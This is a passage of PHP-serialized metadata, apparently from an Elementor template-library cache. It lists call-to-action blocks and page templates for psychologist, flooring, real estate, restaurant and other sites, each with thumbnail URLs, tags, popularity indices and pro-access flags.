10\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_13-1.png\";s:12:\"tmpl_created\";i:1520520760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:190;s:11:\"trend_index\";i:118;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:434;a:16:{s:4:\"tmpl\";i:1044;s:2:\"id\";i:15188;s:5:\"title\";s:28:\"Psychologist &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/09/Pricing.jpg\";s:12:\"tmpl_created\";i:1600159731;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/psychologist-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:732;s:11:\"trend_index\";i:537;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:435;a:16:{s:4:\"tmpl\";i:633;s:2:\"id\";i:5930;s:5:\"title\";s:6:\"CTA 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_15.png\";s:12:\"tmpl_created\";i:1520520758;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:76;s:11:\"trend_index\";i:84;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:436;a:16:{s:4:\"tmpl\";i:1043;s:2:\"id\";i:15167;s:5:\"title\";s:29:\"Psychologist &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/09/Services.jpg\";s:12:\"tmpl_created\";i:1600158206;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/psychologist-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:606;s:11:\"trend_index\";i:379;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:437;a:16:{s:4:\"tmpl\";i:632;s:2:\"id\";i:5921;s:5:\"title\";s:6:\"CTA 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_14.png\";s:12:\"tmpl_created\";i:1520520757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:278;s:11:\"trend_index\";i:234;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:438;a:16:{s:4:\"tmpl\";i:1036;s:2:\"id\";i:14932;s:5:\"title\";s:30:\"Flooring Company &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/About.png\";s:12:\"tmpl_created\";i:1597740110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/flooring-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:488;s:11:\"trend_index\";i:319;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:439;a:16:{s:4:\"tmpl\";i:618;s:2:\"id\";i:5607;s:5:\"title\";s:6:\"CTA 13\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_5.png\";s:12:\"tmpl_created\";i:1520520695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:42;s:11:\"trend_index\";i:11;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:440;a:16:{s:4:\"tmpl\";i:1037;s:2:\"id\";i:14998;s:5:\"title\";s:32:\"Flooring Company &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/08/Contact-Us.png\";s:12:\"tmpl_created\";i:1597740222;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:553;s:11:\"trend_index\";i:380;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:441;a:16:{s:4:\"tmpl\";i:574;s:2:\"id\";i:6017;s:5:\"title\";s:6:\"CTA 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_14.png\";s:12:\"tmpl_created\";i:1520520331;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:152;s:11:\"trend_index\";i:122;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:442;a:16:{s:4:\"tmpl\";i:1038;s:2:\"id\";i:14965;s:5:\"title\";s:32:\"Flooring Company &#8211; Gallery\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/Gallery.png\";s:12:\"tmpl_created\";i:1597740353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:371;s:11:\"trend_index\";i:291;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:443;a:16:{s:4:\"tmpl\";i:628;s:2:\"id\";i:5885;s:5:\"title\";s:6:\"CTA 15\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_11.png\";s:12:\"tmpl_created\";i:1520520751;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:274;s:11:\"trend_index\";i:256;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:444;a:16:{s:4:\"tmpl\";i:1282;s:2:\"id\";i:22417;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1647354987;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:445;a:16:{s:4:\"tmpl\";i:627;s:2:\"id\";i:5877;s:5:\"title\";s:6:\"CTA 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_10.png\";s:12:\"tmpl_created\";i:1520520749;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:564;s:11:\"trend_index\";i:677;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:446;a:16:{s:4:\"tmpl\";i:1040;s:2:\"id\";i:14947;s:5:\"title\";s:33:\"Flooring company &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/08/Services.png\";s:12:\"tmpl_created\";i:1597740551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/flooring-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:538;s:11:\"trend_index\";i:392;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:447;a:16:{s:4:\"tmpl\";i:625;s:2:\"id\";i:5860;s:5:\"title\";s:6:\"CTA 17\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_9.png\";s:12:\"tmpl_created\";i:1520520746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:120;s:11:\"trend_index\";i:63;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:448;a:16:{s:4:\"tmpl\";i:1039;s:2:\"id\";i:14901;s:5:\"title\";s:29:\"Flooring Company &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Home.png\";s:12:\"tmpl_created\";i:1597740474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/flooring-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:387;s:11:\"trend_index\";i:185;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:449;a:16:{s:4:\"tmpl\";i:626;s:2:\"id\";i:5869;s:5:\"title\";s:6:\"CTA 18\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_10.png\";s:12:\"tmpl_created\";i:1520520747;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:345;s:11:\"trend_index\";i:486;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:450;a:16:{s:4:\"tmpl\";i:611;s:2:\"id\";i:5542;s:5:\"title\";s:6:\"CTA 19\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_1.png\";s:12:\"tmpl_created\";i:1520520681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:169;s:11:\"trend_index\";i:270;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:451;a:16:{s:4:\"tmpl\";i:1252;s:2:\"id\";i:22146;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1647177514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:452;a:16:{s:4:\"tmpl\";i:614;s:2:\"id\";i:5567;s:5:\"title\";s:5:\"CTA 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_2.png\";s:12:\"tmpl_created\";i:1520520685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:143;s:11:\"trend_index\";i:225;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:453;a:16:{s:4:\"tmpl\";i:1021;s:2:\"id\";i:14737;s:5:\"title\";s:32:\"Luxury Real Estate &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/About.png\";s:12:\"tmpl_created\";i:1595313527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/luxury-real-estate-about-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:150;s:11:\"trend_index\";i:447;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:454;a:16:{s:4:\"tmpl\";i:629;s:2:\"id\";i:5893;s:5:\"title\";s:6:\"CTA 21\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_12.png\";s:12:\"tmpl_created\";i:1520520752;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:259;s:11:\"trend_index\";i:457;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:455;a:16:{s:4:\"tmpl\";i:1020;s:2:\"id\";i:14756;s:5:\"title\";s:34:\"Luxury Real Estate &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Contact-Us.png\";s:12:\"tmpl_created\";i:1595313519;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/luxury-real-estate-contact-us-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:610;s:11:\"trend_index\";i:569;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:456;a:16:{s:4:\"tmpl\";i:619;s:2:\"id\";i:5634;s:5:\"title\";s:6:\"CTA 24\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_6.png\";s:12:\"tmpl_created\";i:1520520699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-24/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:188;s:11:\"trend_index\";i:255;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:457;a:16:{s:4:\"tmpl\";i:1019;s:2:\"id\";i:14716;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:165;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:458;a:16:{s:4:\"tmpl\";i:620;s:2:\"id\";i:5642;s:5:\"title\";s:6:\"CTA 25\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_6.png\";s:12:\"tmpl_created\";i:1520520701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-25/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:226;s:11:\"trend_index\";i:262;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:459;a:16:{s:4:\"tmpl\";i:1018;s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:167;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:460;a:16:{s:4:\"tmpl\";i:1283;s:2:\"id\";i:22423;s:5:\"title\";s:39:\"Online Store &#8211; Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1647355154;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:461;a:16:{s:4:\"tmpl\";i:615;s:2:\"id\";i:5583;s:5:\"title\";s:6:\"CTA 26\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_3.png\";s:12:\"tmpl_created\";i:1520520689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-26/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:117;s:11:\"trend_index\";i:117;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:462;a:16:{s:4:\"tmpl\";i:630;s:2:\"id\";i:5904;s:5:\"title\";s:6:\"CTA 27\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_13.png\";s:12:\"tmpl_created\";i:1520520754;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-27/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:528;s:11:\"trend_index\";i:517;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:463;a:16:{s:4:\"tmpl\";i:1010;s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:287;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:464;a:16:{s:4:\"tmpl\";i:1284;s:2:\"id\";i:22428;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1647355339;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:465;a:16:{s:4:\"tmpl\";i:631;s:2:\"id\";i:5912;s:5:\"title\";s:6:\"CTA 28\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_11.png\";s:12:\"tmpl_created\";i:1520520755;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-28/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:665;s:11:\"trend_index\";i:702;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:466;a:16:{s:4:\"tmpl\";i:473;s:2:\"id\";i:5189;s:5:\"title\";s:6:\"CTA 29\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_1.png\";s:12:\"tmpl_created\";i:1520443456;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:472;s:11:\"trend_index\";i:631;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:467;a:16:{s:4:\"tmpl\";i:1007;s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant &#8211; Chef&#8217;s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:675;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:468;a:16:{s:4:\"tmpl\";i:623;s:2:\"id\";i:5667;s:5:\"title\";s:5:\"CTA 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_8.png\";s:12:\"tmpl_created\";i:1520520705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:171;s:11:\"trend_index\";i:250;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:469;a:16:{s:4:\"tmpl\";i:1006;s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant &#8211; Bar 